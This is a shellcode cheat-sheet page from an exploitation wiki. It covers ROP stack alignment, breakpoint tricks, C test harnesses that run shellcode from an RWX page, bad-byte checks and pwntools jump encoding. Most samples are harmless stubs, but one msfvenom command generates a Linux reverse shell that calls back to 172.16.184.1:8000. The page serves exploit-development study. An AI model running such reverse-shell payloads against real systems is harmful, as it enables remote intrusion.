Leet Sheet

Shellcode


Last updated 2 years ago


Common Problems

Don’t Send Data Too Fast

Sending data too fast can produce unexpected results, especially in applications written for a human sitting at a keyboard. A server that reads input line by line, or that has not finished handling your previous message, may simply miss part of what you send.

For example, I couldn’t get a segfault to occur in . After I added 1 second sleeps between all the network traffic I sent, it started working 100% of the time.

Stack Alignment

You may need to align the stack when doing ROP chains. On x86-64 the System V ABI requires rsp to be 16-byte aligned at the moment a call is made, and glibc functions such as system() and printf() rely on that (they use SSE instructions like movaps on stack memory), so calling them from a chain with a misaligned stack crashes inside libc. The usual fix is to put a single ret gadget in the chain right before the problematic call, which shifts rsp by 8 bytes; check rsp & 0xf in a debugger at the point of the call. If your exploit works locally but not remotely (a different libc build or a different stack layout on the target), then this is one possible cause.

Testing out shellcode

Breakpoint trick

If you’re not sure whether your shellcode is being reached (for example during a normal run without a debugger), put a 0xCC byte (the one-byte int3 instruction) at the start of it. With no debugger attached the kernel delivers SIGTRAP and the process dies with "Trace/breakpoint trap", which tells you that control reached your code; under gdb the process simply stops at that point. pwntools emits it with pwn.asm(pwn.shellcraft.i386.trap()). Take it out again before the real run, since the trap is fatal.

Unlike a segfault, a SIGTRAP does not leave a line in dmesg. If you want a kernel log entry, use something that segfaults instead, like pwn.asm(pwn.shellcraft.i386.crash()) from pwntools: the kernel then logs "segfault at ... ip ... sp ..." for the process (subject to the kernel's unhandled-signal logging setting, and rate-limited). You can also use pwn.asm(pwn.shellcraft.i386.infloop()) to create an infinite loop (jmp $); the process then stays alive, so you can attach a debugger to it and inspect its state.

Shellcode repository

The shell-storm Shellcodes Database is a public collection of ready-made shellcode for many platforms. But really, using msfvenom to generate your own shellcode is better in pretty much every way: database shellcode was written for someone else's constraints (bad bytes, size limit, target kernel) and you should at least disassemble it before running it.

Test files

Shellcode from a database usually comes with a small C test file that copies the bytes into a buffer and jumps to them. Compiling it needs extra gcc options that switch off the protections which would otherwise stop it: -z execstack makes the stack executable (shellcode in a stack buffer can then run; a global buffer may still need to sit in an executable mapping, or be copied into one with mmap/mprotect), -fno-stack-protector removes the stack canary, and -no-pie keeps addresses fixed between runs:

gcc test.c -o test -fno-stack-protector -z execstack -no-pie
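The following harness is an added example, not code from this page or from any shellcode database; it covers both the breakpoint trick above and the test-file idea. Instead of relying on -z execstack it maps its own RWX page with mmap, and it runs the candidate bytes in a forked child so the parent can report how the child ended: SIGTRAP means the 0xCC marker was hit, SIGSEGV means a crash() marker was hit, SIGALRM means the payload hung, and a plain exit status means it ran to the end. It assumes Linux on x86-64, and every sample payload in it is constructed here (an int3, a null-pointer read, a jmp $, and an exit(42) syscall).

```c
/* Added example (not from the Leet Sheet page): a shellcode test harness that
 * reports how a payload ended.  It maps an RWX page with mmap (so no
 * -z execstack is needed), copies the candidate bytes in, and jumps to them
 * in a forked child so the parent survives whatever the shellcode does.
 * Assumes Linux on x86-64; all sample payloads below are constructed here. */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <unistd.h>

#define PAGE 4096
#define HANG_SECONDS 1          /* how long a payload may run before we call it hung */
enum { RUN_ERROR = -1000 };     /* harness failure, distinct from any signal or exit code */

/* Run `code` in a child.  Returns the child's exit status (>= 0) if it exited,
 * minus the signal number if it was killed, or RUN_ERROR if the harness failed. */
static int run_shellcode(const unsigned char *code, size_t len)
{
    if (len == 0 || len > PAGE)
        return RUN_ERROR;
    void *page = mmap(NULL, PAGE, PROT_READ | PROT_WRITE | PROT_EXEC,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED)
        return RUN_ERROR;
    memcpy(page, code, len);

    pid_t pid = fork();
    if (pid < 0) {
        munmap(page, PAGE);
        return RUN_ERROR;
    }
    if (pid == 0) {
        alarm(HANG_SECONDS);            /* a hung payload (e.g. jmp $) dies with SIGALRM */
        ((void (*)(void))page)();       /* jump into the shellcode */
        _exit(200);                     /* only reached if the payload returns */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) {
        munmap(page, PAGE);
        return RUN_ERROR;
    }
    munmap(page, PAGE);
    if (WIFEXITED(status))
        return WEXITSTATUS(status);
    if (WIFSIGNALED(status))
        return -WTERMSIG(status);
    return RUN_ERROR;
}

/* Constructed x86-64 payloads for the demonstration. */
static const unsigned char sc_trap[]    = { 0xcc };                   /* int3 */
static const unsigned char sc_crash[]   = { 0x31, 0xc0, 0x8b, 0x00 }; /* xor eax,eax ; mov eax,[rax] */
static const unsigned char sc_infloop[] = { 0xeb, 0xfe };             /* jmp $ */
static const unsigned char sc_exit42[]  = {
    0xbf, 0x2a, 0x00, 0x00, 0x00,   /* mov edi, 42 */
    0xb8, 0x3c, 0x00, 0x00, 0x00,   /* mov eax, 60 (SYS_exit) */
    0x0f, 0x05                      /* syscall */
};

/* Human-readable summary of one run_shellcode() result. */
static void report(const char *name, int r)
{
    if (r == RUN_ERROR)  printf("%-8s harness error\n", name);
    else if (r < 0)      printf("%-8s killed by signal %d (%s)\n", name, -r, strsignal(-r));
    else                 printf("%-8s exited with status %d\n", name, r);
}

int main(void)
{
    report("trap",    run_shellcode(sc_trap,    sizeof sc_trap));
    report("crash",   run_shellcode(sc_crash,   sizeof sc_crash));
    report("exit42",  run_shellcode(sc_exit42,  sizeof sc_exit42));
    report("infloop", run_shellcode(sc_infloop, sizeof sc_infloop));
    return 0;
}
```

Compile it with a plain gcc harness.c -o harness; no special flags are needed because the page comes from mmap rather than the stack. Because the payload runs in a child, the int3 is fatal only to the child; if you run the harness under gdb with follow-fork-mode child, gdb will catch the SIGTRAP instead and you can single-step from there.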

Generating Shellcode

Generating shellcode with msfvenom

You can generate shellcode for a reverse shell using msfvenom.

This is an example of an x86 Linux reverse shell that connects back to 172.16.184.1 on port 8000 (start a listener there first, e.g. with nc). The output format is python, so you can paste it straight into a pwntools script.

msfvenom -p linux/x86/shell_reverse_tcp LHOST=172.16.184.1 LPORT=8000 -a x86 --platform linux -f python

You can also list bytes that the shellcode must not contain, using -b (for example -b '\x00\x0a\x0d' when the payload passes through a C string or a line-based reader; add \x5c if backslashes get escaped). msfvenom then picks an encoder such as x86/shikata_ga_nai to avoid them. Two caveats: the encoder's decoder stub rewrites the payload in place, so it has to run from memory that is both writable and executable, and you should still check the final bytes yourself rather than trusting the tool.
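The check below is an added example, not code from this page or from msfvenom. It scans a shellcode blob for forbidden bytes and shows why NUL is the classic bad character: anything delivered through strcpy, sprintf or a similar C-string copy is cut off at the first 0x00. The two payloads are constructed here; both are x86-64 exit(1), once written the obvious way (full of NULs) and once NUL-free.

```c
/* Added example (not from the page or from msfvenom): find bytes a delivery
 * path cannot carry, and show how much of a NUL-containing payload a C-string
 * copy would actually deliver.  Both payloads are constructed here (x86-64). */
#include <stddef.h>
#include <stdio.h>

/* Returns the index of the first byte of `code` that appears in `bad`, or -1. */
static long first_bad_byte(const unsigned char *code, size_t len,
                           const unsigned char *bad, size_t nbad)
{
    for (size_t i = 0; i < len; i++)
        for (size_t j = 0; j < nbad; j++)
            if (code[i] == bad[j])
                return (long)i;
    return -1;
}

/* How many bytes strcpy/strcat/sprintf would copy: everything up to the first NUL. */
static size_t delivered_by_strcpy(const unsigned char *code, size_t len)
{
    size_t n = 0;
    while (n < len && code[n] != 0)
        n++;
    return n;
}

/* exit(1) the obvious way: mov edi,1 ; mov eax,60 ; syscall */
static const unsigned char naive_exit1[] = {
    0xbf, 0x01, 0x00, 0x00, 0x00,   /* mov edi, 1   (three NULs) */
    0xb8, 0x3c, 0x00, 0x00, 0x00,   /* mov eax, 60  (three NULs) */
    0x0f, 0x05                      /* syscall */
};
/* The same exit(1) written NUL-free: xor edi,edi ; inc edi ; push 60 ; pop rax ; syscall */
static const unsigned char clean_exit1[] = {
    0x31, 0xff,     /* xor edi, edi */
    0xff, 0xc7,     /* inc edi */
    0x6a, 0x3c,     /* push 60 */
    0x58,           /* pop rax */
    0x0f, 0x05      /* syscall */
};
/* Typical bad-character set: NUL, LF, CR, backslash. */
static const unsigned char badchars[] = { 0x00, 0x0a, 0x0d, 0x5c };

int main(void)
{
    printf("naive: first bad byte at %ld, strcpy delivers %zu of %zu bytes\n",
           first_bad_byte(naive_exit1, sizeof naive_exit1, badchars, sizeof badchars),
           delivered_by_strcpy(naive_exit1, sizeof naive_exit1), sizeof naive_exit1);
    printf("clean: first bad byte at %ld, strcpy delivers %zu of %zu bytes\n",
           first_bad_byte(clean_exit1, sizeof clean_exit1, badchars, sizeof badchars),
           delivered_by_strcpy(clean_exit1, sizeof clean_exit1), sizeof clean_exit1);
    return 0;
}
```

The naive version is truncated to its first two bytes, a lone mov opcode with no immediate, which is the kind of silent failure that makes "the shellcode just doesn't run" so hard to debug. Run the same scan over msfvenom's output before sending it.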

Generating Assembly Using Pwntools

You can use pwntools to assemble whatever instructions you want into machine code (pwnlib.asm). Both the pwn asm command and pwn.asm() default to i386; pass -c amd64 on the command line or set pwn.context.arch = 'amd64' in Python for 64-bit code, although a relative jump like the one below encodes identically in both modes. For example, here is the syntax for a relative jump on the command line:

pwn asm 'jmp $+0x20'

And this is how you can do it in Python code:

>>> import pwn
>>> pwn.asm('jmp $+0x20')
b'\xeb\x1e'
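To see where those two bytes come from, here is an added example (not code from the page or from pwntools) that hand-encodes and decodes a relative x86 jmp. The displacement is measured from the end of the jmp instruction, so jmp $+0x20 (land 0x20 bytes past the start of the jmp) becomes EB 1E: 0x20 minus the 2 bytes of the instruction itself. The encoder also handles the 5-byte E9 rel32 form that pwntools would pick for a longer hop, and the test values (including jmp $, the infloop encoding EB FE) are constructed here.

```c
/* Added example (not from the page or pwntools): encode and decode x86 `jmp`
 * relative to the start of the instruction, the way `jmp $+delta` is written.
 * The rel8/rel32 displacement is relative to the END of the jmp, which is why
 * jmp $+0x20 is EB 1E and jmp $ (infinite loop) is EB FE.  Same bytes in
 * 32- and 64-bit mode. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define JMP_INVALID INT32_MIN   /* returned by decode_jmp_rel() for non-jmp input */

/* Encode `jmp $+delta` into out (up to 5 bytes); returns the encoded length. */
static size_t encode_jmp_rel(int32_t delta, uint8_t out[5])
{
    int32_t rel8 = delta - 2;                  /* short form: EB rel8 */
    if (rel8 >= -128 && rel8 <= 127) {
        out[0] = 0xEB;
        out[1] = (uint8_t)rel8;
        return 2;
    }
    uint32_t rel32 = (uint32_t)(delta - 5);    /* near form: E9 rel32, little-endian */
    out[0] = 0xE9;
    out[1] = (uint8_t)(rel32);
    out[2] = (uint8_t)(rel32 >> 8);
    out[3] = (uint8_t)(rel32 >> 16);
    out[4] = (uint8_t)(rel32 >> 24);
    return 5;
}

/* Inverse: the delta (relative to the jmp's own start) of an encoded jmp,
 * or JMP_INVALID if the bytes are not a short or near jmp. */
static int32_t decode_jmp_rel(const uint8_t *code, size_t len)
{
    if (len >= 2 && code[0] == 0xEB)
        return (int32_t)(int8_t)code[1] + 2;
    if (len >= 5 && code[0] == 0xE9) {
        uint32_t u = (uint32_t)code[1] | (uint32_t)code[2] << 8 |
                     (uint32_t)code[3] << 16 | (uint32_t)code[4] << 24;
        return (int32_t)u + 5;
    }
    return JMP_INVALID;
}

/* Convenience check: does `jmp $+delta` encode to exactly these n bytes? */
static int encodes_to(int32_t delta, const uint8_t *expect, size_t n)
{
    uint8_t buf[5];
    size_t len = encode_jmp_rel(delta, buf);
    return len == n && memcmp(buf, expect, n) == 0;
}
```

jmp $+0x20 is the classic way to hop over a 0x1e-byte block of inline data (a string, a pointer table) inside shellcode; the decoder is handy when you are reading a payload from a database and want to know where a jump in it actually lands.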

Links

  • Fusion 2
  • pwntools issue 1870 (reference to the problem): https://githubmemory.com/repo/Gallopsled/pwntools/issues/1870
  • shell-storm | Shellcodes Database
  • pwnlib.asm, Assembler functions, pwntools 4.8.0 documentation